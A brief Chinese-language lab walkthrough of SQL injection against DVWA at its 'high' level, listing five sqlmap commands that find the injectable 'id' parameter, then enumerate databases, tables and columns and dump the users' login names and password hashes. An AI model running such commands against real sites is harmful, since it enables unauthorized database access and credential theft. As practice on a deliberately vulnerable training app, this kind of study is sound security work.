DVWA 之high级别sql注入
Sqlmap 高级注入,抓包,然后保存数据到1.txt
1.判断注入点
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 #level是注入的等级,默认是1
2.爆数据库
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dbs
3.爆表
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --tables -D "dvwa"
4. 爆字段
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --columns -D "dvwa" -T "users"
5.爆帐号密码
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dump -D "dvwa" -T "users" -C "user,password"